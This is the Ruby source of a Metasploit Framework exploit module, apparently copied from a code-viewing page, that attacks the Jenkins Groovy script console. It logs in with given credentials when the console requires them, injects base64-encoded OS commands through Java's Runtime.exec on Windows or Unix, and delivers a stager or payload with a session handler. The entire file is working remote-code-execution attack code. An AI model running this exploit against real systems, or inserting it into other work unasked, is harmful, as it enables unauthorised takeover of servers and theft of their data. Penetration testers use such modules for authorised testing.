1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'Jenkins Script-Console Java Execution', 'Description'=> %q{ This module uses the Jenkins Groovy script console to execute OS commands using Java. }, 'Author' => [ 'Spencer McIntyre', 'jamcut' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: $', 'DefaultOptions' => { 'WfsDelay' => '10', }, 'References' => [ ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'] ], 'Targets' => [ ['Windows',{'Arch' => ARCH_X86, 'Platform' => 'win'}], ['Unix', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}], ], 'DisclosureDate' => 'Jan 18 2013', 'DefaultTarget'=> 0)) register_options( [ OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]), ], self.class) end def check res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"}) if res and res.headers.include?('X-Jenkins') return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def http_send_command(cmd, opts = {}) res = send_request_cgi({ 'method'=> 'POST', 'uri' => datastore['PATH'] + '/script', 'cookie'=> @cookie, 'vars_post' => { 'script' => java_craft_runtime_exec(cmd), 'Submit' => 'Run' } }) if not (res and res.code == 200) fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') end end def java_craft_runtime_exec(cmd) decoder = Rex::Text.rand_text_alpha(5, 8) decoded_bytes = Rex::Text.rand_text_alpha(5, 8) cmd_array = Rex::Text.rand_text_alpha(5, 8) jcode ="sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n" jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n" jcode << "String [] #{cmd_array} = new String[3];\n" if target['Platform'] == 'win' jcode << "#{cmd_array}[0] = \"cmd.exe\";\n" jcode << "#{cmd_array}[1] = \"/c\";\n" else jcode << "#{cmd_array}[0] = \"/bin/sh\";\n" jcode << "#{cmd_array}[1] = \"-c\";\n" end jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n" jcode << "Runtime.getRuntime().exec(#{cmd_array});\n" jcode end def execute_command(cmd, opts = {}) http_send_command("#{cmd}") end def exploit print_status('Checking access to the script console') res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"}) if not (res and res.code) fail_with(Exploit::Failure::Unknown) end sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0] @cookie = "#{sessionid}" if res.code != 200 print_status('Logging in...') res = send_request_cgi({ 'method'=> 'POST', 'uri' => datastore['PATH'] + '/j_acegi_security_check', 'cookie'=> @cookie, 'vars_post' => { 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), 'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'), 'Submit' => 'log in' } }) if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ fail_with(Exploit::Failure::NoAccess, 'login failed') end else print_status('No authentication required, skipping login...') end case target['Platform'] when 'win' print_status("#{rhost}:#{rport} - Sending VBS stager...") execute_cmdstager({:linemax => 2049}) when 'unix' print_status("#{rhost}:#{rport} - Sending payload...") http_send_command("#{payload.encoded}") end handler end end |